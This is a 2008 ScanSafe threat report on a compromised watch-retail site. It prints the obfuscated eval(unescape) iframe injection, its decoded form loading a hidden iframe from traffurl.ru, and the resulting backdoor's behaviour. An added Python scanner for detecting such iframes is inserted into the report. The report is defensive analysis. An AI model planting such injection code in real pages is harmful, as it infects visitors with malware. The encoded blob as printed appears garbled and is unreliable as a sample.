ScanSafe

Report Date: April 15, 2008

Sitename: Watchmaster.org
Nature: Injected iFrame
First Blocked: April 6, 2008
Severity: High
Summary

On April 6, 2008, ScanSafe detected malicious content on the website of www.watchmaster.org. This site was heavily advertised via sponsored links appearing on Nextel, shopping.aol, bizrate, and similar ecommerce sites. Following is an example screenshot of one such advertisement:

Investigation revealed the presence of a malicious iframe appended to the HTML source page for watchmaster.org:

eval(unescape(" 6964%6f2e%736 1753d44%6f65% 2764636d%6574 %2e72%6965%283c% 69%6661%6d2061%6 d3d323537%30 64622072 3d%5c6874%702f%2f 72%616672%6c 722f6c76%3f2b 61687275 644d%6168726 e%646d29%2a34 36342b635c%2 7%2069%646835%38 20%6869%67%683d 31%377379%6c%65 5c64%6970%6c%61 %79206f65%5c 3e2f6661%6d3 e29 "));

The decoded version is as follows:

window.status='Done';document.write('<iframe name=82950706d8ba src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*242694)+'c8\' width=582 height=417 style=\'display: none\'>')

The page loaded by this iframe also included an iframe that loads malicious content from http://traffurl.ru/slivv/index.php. On unprotected systems, successful exploit leads to the installation of a variant of the Zapchast backdoor Trojan family.
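As an added illustration (not part of the ScanSafe report), the following Python scanner decodes an eval(unescape("...")) wrapper the way the browser would and then flags the hidden, off-site iframe that the decoded document.write() emits; the sample page and the %XX-encoded payload inside it are constructed for this example from the decoded script quoted above.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: the decoded script quoted in the report, re-encoded
# here as %XX escapes so the decoder has realistic input (not the original blob).
DECODED_SCRIPT = ("window.status='Done';document.write('<iframe name=82950706d8ba "
                  "src=\\'http://traffurl.ru/sliv?'+Math.round(Math.random()*242694)"
                  "+'c8\\' width=582 height=417 style=\\'display: none\\'></iframe>')")
SAMPLE_HTML = ('<html><body><h1>Watches</h1></body></html>\n<script>eval(unescape("'
               + ''.join(f'%{ord(c):02x}' for c in DECODED_SCRIPT) + '"));</script>')

EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S)
IFRAME_TAG = re.compile(r'<\s*iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'(\w+)\s*=\s*(?:["\']([^"\']*)["\']|([^\s>]+))')


def js_unescape(s):
    """Python equivalent of JavaScript's unescape(): %uXXXX first, then %XX."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def iframe_attrs(tag_body):
    """Parse name=value pairs; JS string concatenation between them is skipped."""
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in ATTR.finditer(tag_body)}


def scan_page(html, page_host):
    """Flag iframes that are CSS-hidden or point off-site, including ones that
    only appear after decoding an eval(unescape("...")) wrapper."""
    sources = [('html', html)]
    for m in EVAL_UNESCAPE.finditer(html):
        # Undo JS-level quoting inside the decoded document.write() string.
        decoded = js_unescape(m.group(2)).replace("\\'", "'").replace('\\"', '"')
        sources.append(('eval(unescape())', decoded))
    findings = []
    for origin, text in sources:
        for tag in IFRAME_TAG.finditer(text):
            attrs = iframe_attrs(tag.group(1))
            src = attrs.get('src', '')
            host = (urlparse(src).hostname or '').lower()
            style = attrs.get('style', '').replace(' ', '').lower()
            reasons = []
            if 'display:none' in style or 'visibility:hidden' in style:
                reasons.append('hidden via CSS')
            if host and host != page_host and not host.endswith('.' + page_host):
                reasons.append('off-site src ' + host)
            if reasons:
                findings.append({'origin': origin, 'src': src, 'reasons': reasons})
    return findings
```

Running scan_page(SAMPLE_HTML, 'watchmaster.org') reports one iframe, found only after decoding, that is both hidden via CSS and sourced from traffurl.ru; the random cache-busting query string does not affect the match because only the scheme and host are compared.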

The integrity or legitimacy of the watchmaster.org website is not known. The registered whois data indicates ownership in Malaysia dating back to 2005 and the IP is hosted in Florida. According to Google, 186 sites link to watchmaster.org, but most or all of these appear to be related to recent sponsored links:

The nature of the malware involved and the high-profile nature of the sponsored link hosts result in the threat being classified as High.

Infection Method

The malicious script referenced by the iframe attempts to exploit the Microsoft Internet Explorer ADODB.Stream ActiveX Control functionality in order to automate the download and installation of the Trojan.

Malware Behavior
  • Installed malware includes a backdoor Trojan which also attempts to connect to sites hosted in Russia.
  • When the downloaded file, load.exe, is run, it drops a hidden file named ~tmp1174.exe and loads this file as a process on the system. The malware then attempts to contact ya.ru and traffurl.ru in an attempt to download additional malware and instructions from the attacker(s).

Miscellaneous

The traffurl.ru domain used to distribute the Zapchast variant in the watchmaster.org compromise is also commonly associated with distribution or command and control of the Ldpinch family of keylogger/data theft Trojans.

This form was completed by: Mary Landesman